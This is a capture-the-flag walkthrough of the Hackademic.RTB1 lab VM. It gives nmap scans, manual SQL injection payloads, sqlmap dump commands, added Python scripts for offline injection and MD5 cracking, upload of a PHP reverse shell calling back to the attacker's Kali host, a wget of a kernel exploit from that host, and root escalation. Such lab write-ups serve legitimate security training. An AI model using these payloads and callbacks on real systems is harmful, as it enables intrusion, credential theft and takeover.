Second box
Box info:
1) Box name: 2-Free-Hackademic.RTB1
2) Box download link: https://pan.baidu.com/s/1IMWhKd3h8sDcPelzXXhxKg (extraction code: o5k0)
Walkthrough:
1) Start the target VM with its network adapter in host-only mode. The host-only network is 192.168.56.0/24, so the target must have an address in that range.
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124001920774-906007840.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124001937446-99952703.png
2) Sweep 192.168.56.0/24 with nmap for live hosts (-sP is the legacy alias of -sn, host discovery only, no port scan)
#nmap -sP 192.168.56.0/24
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124001954295-1806807645.png
The sweep identifies the target as 192.168.56.104
3) Scan all 65535 TCP ports on that IP with nmap
#nmap -p- 192.168.56.104
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002008380-1056390475.png
The scan finds port 80 open
4) Fingerprint the service on port 80 (version detection plus default NSE scripts)
#nmap -p80 -sV -sC 192.168.56.104
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002029516-1027616793.png
5) Open the web page
http://192.168.56.104/
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002046899-417743433.png
6) Click the title "Hackademic_RTB1"; the following page appears
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002123340-745867172.png
7) Click "Got root"; the URL now carries a parameter: http://192.168.56.104/Hackademic_RTB1/?p=9
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002154635-2109123293.png
8) Test this URL for SQL injection
http://192.168.56.104/Hackademic_RTB1/?p=9
http://192.168.56.104/Hackademic_RTB1/?p=9'
The page shows no visible change, so no injection is evident in the p parameter. (An unchanged page only rules out error-based and simple boolean injection; blind or time-based injection would need further probes, which this walkthrough does not pursue because a better parameter turns up next.)
9) Click "Uncategorized" at the bottom of that page; the URL parameter changes again
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002213750-1475439669.png
10) Test this URL for SQL injection: the page changes when a quote is appended, which indicates a SQL injection vulnerability in the cat parameter
http://192.168.56.104/Hackademic_RTB1/?cat=1
http://192.168.56.104/Hackademic_RTB1/?cat=1'
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002239664-610071726.png
11) Manual testing. First confirm boolean behaviour (and 1=1 returns the normal page, and 1=2 an empty one), then find the column count with ORDER BY (5 succeeds, 6 errors, so the query returns 5 columns), then use a UNION with 5 values; the second column is reflected in the page, so the extraction expressions go there:
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 6
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,2,3,4,5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,database(),3,4,5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='wp_users'
(The MySQL function is database(), not databases(); the original payload had a typo there.)
12) Automated injection with sqlmap
① Detect the DBMS and confirm the injection
# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --batch
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002301550-863480861.png
② List the databases
# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL --dbs --batch
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002317754-1286997576.png
③ List the tables in the wordpress database
# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL -D "wordpress" --tables --batch
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002349614-1303154268.png
④ List all columns of the wp_users table
# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL -D "wordpress" -T "wp_users" --columns --batch
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002411021-1772334676.png
⑤ Dump the user_login and user_pass columns
# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL -D "wordpress" -T "wp_users" -C user_login,user_pass --dump --batch
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002429299-1664783867.png
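The manual payloads of step 11 and the sqlmap dump of step 12 follow one mechanical procedure: error on a stray quote, boolean difference, ORDER BY to count columns, UNION to reflect data. The script below re-creates that procedure offline. It is an added example, not code from the walkthrough, from Hackademic_RTB1 or from WordPress: the tables, rows and password hashes are constructed, and SQLite stands in for MySQL, so sqlite_master and pragma_table_info replace information_schema and group_concat(a||':'||b) replaces MySQL's group_concat(concat(a,':',b)). The hardened safe_query shows the fix beside the bug.

```python
"""
Offline re-creation of the ?cat= injection from steps 11 and 12.
Added example; SQLite in-memory stand-in, constructed data.
"""
import hashlib
import sqlite3
from typing import List, Optional, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed stand-ins for the WordPress tables the walkthrough touches."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_categories (cat_ID INTEGER, cat_name TEXT, "
        "category_nicename TEXT, category_description TEXT, category_parent INTEGER)"
    )
    conn.execute("INSERT INTO wp_categories VALUES (1, 'Uncategorized', 'uncategorized', '', 0)")
    conn.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    for uid, login, pw in [(1, "GeorgeMiller", "constructed-pass-1"),
                           (2, "JohnSmith", "constructed-pass-2")]:
        # pre-2.5 WordPress stored unsalted MD5; these passwords are made up
        conn.execute("INSERT INTO wp_users VALUES (?, ?, ?)",
                     (uid, login, hashlib.md5(pw.encode()).hexdigest()))
    conn.commit()
    return conn


def vulnerable_query(conn: sqlite3.Connection, cat: str) -> List[Tuple]:
    """The bug class behind ?cat=: the parameter is concatenated into the SQL text."""
    return conn.execute("SELECT * FROM wp_categories WHERE cat_ID = " + cat).fetchall()


def safe_query(conn: sqlite3.Connection, cat: str) -> List[Tuple]:
    """Hardened form: validate the type, then bind the value as a parameter."""
    if not cat.isdigit():
        return []
    return conn.execute("SELECT * FROM wp_categories WHERE cat_ID = ?", (int(cat),)).fetchall()


def probe(conn: sqlite3.Connection, payload: str) -> Optional[List[Tuple]]:
    """Send one payload; None models the 'page changed / SQL error' signal."""
    try:
        return vulnerable_query(conn, payload)
    except sqlite3.Error:
        return None


def is_injectable(conn: sqlite3.Connection) -> bool:
    """Steps 10/11: a stray quote errors out while 'and 1=1' / 'and 1=2' differ."""
    baseline = probe(conn, "1")
    return (bool(baseline)
            and probe(conn, "1'") is None
            and probe(conn, "1 and 1=1") == baseline
            and probe(conn, "1 and 1=2") == [])


def count_columns(conn: sqlite3.Connection, limit: int = 32) -> int:
    """Step 11: ORDER BY n succeeds up to the column count and errors past it."""
    n = 1
    while n <= limit and probe(conn, f"1 and 1=1 order by {n}") is not None:
        n += 1
    return n - 1


def union_extract(conn: sqlite3.Connection, ncols: int, expr: str,
                  from_clause: str = "") -> Optional[str]:
    """Step 11: suppress the real row with 'and 1=2' and reflect expr in column 2."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[1] = expr
    rows = probe(conn, f"1 and 1=2 union select {','.join(cols)} {from_clause}")
    return rows[0][1] if rows else None


def dump_users(conn: sqlite3.Connection) -> Optional[str]:
    """Equivalent of the last step-11 payload / sqlmap --dump of user_login,user_pass."""
    ncols = count_columns(conn)
    return union_extract(conn, ncols, "group_concat(user_login||':'||user_pass)", "from wp_users")


if __name__ == "__main__":
    db = build_db()
    print("injectable:", is_injectable(db))
    print("columns:", count_columns(db))
    print("tables:", union_extract(db, 5, "group_concat(name)", "from sqlite_master where type='table'"))
    print("wp_users columns:", union_extract(db, 5, "group_concat(name)", "from pragma_table_info('wp_users')"))
    print("users:", dump_users(db))
    print("safe query with payload:", safe_query(db, "1 and 1=2 union select 1,2,3,4,5"))
```

Against the real target the probe function would be an HTTP request and the "error" signal a changed page rather than an exception; the ordering of the steps is what carries over.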
13) The user_pass of the last user, JohnSmith, is an unsalted MD5 hash (this old WordPress stores passwords as plain MD5), so it can be looked up or cracked; here an online MD5 lookup is used. (Submitting a hash to a third-party site discloses it; on a real engagement crack it locally instead.)
https://md5.gromweb.com/
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002448779-345674608.png
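An offline alternative to the MD5 lookup site in step 13, added here as an example rather than tooling from the walkthrough: a tiny wordlist cracker with a few mangling rules. The wordlist and the suffixes are constructed for the example (a real run would read rockyou.txt or similar), and the input check matters because WordPress 2.5 and later store phpass hashes ($P$...) that a raw-MD5 cracker cannot handle.

```python
"""
Offline MD5 wordlist cracking for a user_pass value like the one dumped in step 12.
Added example; constructed wordlist and rules.
"""
import hashlib
from typing import Iterable, Optional

# Constructed wordlist for the example; substitute a real list in practice.
WORDLIST = ["password", "letmein", "wordpress", "hackademic", "summer"]

# Constructed mangling suffixes ("" keeps the bare word).
MANGLE_SUFFIXES = ("", "1", "123", "!", "2010")


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def candidates(word: str) -> Iterable[str]:
    """Cheap mangling: case variants plus a few common suffixes, no duplicates."""
    seen = set()
    for base in (word, word.lower(), word.capitalize(), word.upper()):
        for suffix in MANGLE_SUFFIXES:
            cand = base + suffix
            if cand not in seen:
                seen.add(cand)
                yield cand


def looks_like_raw_md5(h: str) -> bool:
    """32 hex chars: pre-2.5 WordPress stored unsalted MD5 in user_pass.
    Later versions store phpass hashes ($P$...) that need a phpass-aware cracker."""
    h = h.strip().lower()
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h)


def crack_md5(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first mangled wordlist entry whose MD5 matches, else None."""
    if not looks_like_raw_md5(target_hex):
        raise ValueError("not a raw MD5 digest: %r" % target_hex)
    target = target_hex.strip().lower()
    for word in wordlist:
        for cand in candidates(word):
            if md5_hex(cand) == target:
                return cand
    return None


if __name__ == "__main__":
    # md5("password") is the well-known 5f4dcc3b5aa765d61d8327deb882cf99
    print(crack_md5("5f4dcc3b5aa765d61d8327deb882cf99", WORDLIST))
    print(crack_md5(md5_hex("Wordpress123"), WORDLIST))
    print(crack_md5("0" * 32, WORDLIST))
```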
14) Scan the site's directories with dirsearch to see whether an admin backend can be found
# dirsearch -u "http://192.168.56.104"
# dirsearch -u "http://192.168.56.104/Hackademic_RTB1/"
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002503117-1851627820.png
15) Browsing the discovered directories reveals the site's admin backend
http://192.168.56.104/Hackademic_RTB1/wp-admin/
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002521570-2094065096.png
16) Log into the backend as the user "GeorgeMiller" obtained through the SQL injection, add php to the list of file types allowed for upload, and click Update Options
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002535847-1951904404.png
17) After that setting is saved, an Upload option appears, which allows PHP files to be uploaded
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002549071-1018988017.png
18) Download the PHP reverse shell script and upload it through the Upload page
#PHP reverse shell script download
https://pentestmonkey.net/tools/web-shells/php-reverse-shell
After downloading, set the IP address in the script to the Kali host's address (192.168.56.103); the script's default port is 1234
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002605181-1413974803.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002618405-903602268.png
The upload succeeds and the response page shows where the file landed: href='/Hackademic_RTB1/wp-content/reverse.php
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002631857-1497489893.png
19) On the Kali host, listen with nc on the port set in the script (1234), then request the uploaded PHP file in the browser
#nc -lvvp 1234
Browser: http://192.168.56.104/Hackademic_RTB1/wp-content/reverse.php
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002655001-1572483894.png
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002708074-1297311988.png
The reverse shell has now connected back
20) Check whether the current user has sudo rights; sudo refuses because it requires a controlling terminal (tty). The reverse shell has none, so sudo cannot be tested without first upgrading the shell to a pty; the walkthrough moves on to a kernel exploit instead.
$sudo -s
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002721808-1396261869.png
21) Check the kernel version: 2.6.31
$uname -a
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002742626-1802050960.png
22) On Kali, search exploit-db for local privilege escalation exploits matching the 2.6.3x kernel series
#searchsploit 2.6.3 | grep -i "local privilege escalation"
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002755673-999854514.png
23) Copy the chosen exploit (15285.c) into Kali's web root and start Apache
# cp /usr/share/exploitdb/exploits/linux/local/15285.c /var/www/html
# systemctl restart apache2
24) From the reverse shell on the target, download the exploit source
$ cd /tmp
$ wget http://192.168.56.103/15285.c
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002817950-794535491.png
25) Compile with gcc and run the exploit; the prompt changes to # once it succeeds (gcc already produces an executable, so the chmod is redundant but harmless)
$ gcc -o exp 15285.c
$ ls
$ chmod +x exp
$ ./exp
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002830763-531519296.png
26) Read the flag as root
#cd /root
#ls
#cat key.txt
https://img2022.cnblogs.com/blog/2180585/202211/2180585-20221124002848395-1845960631.png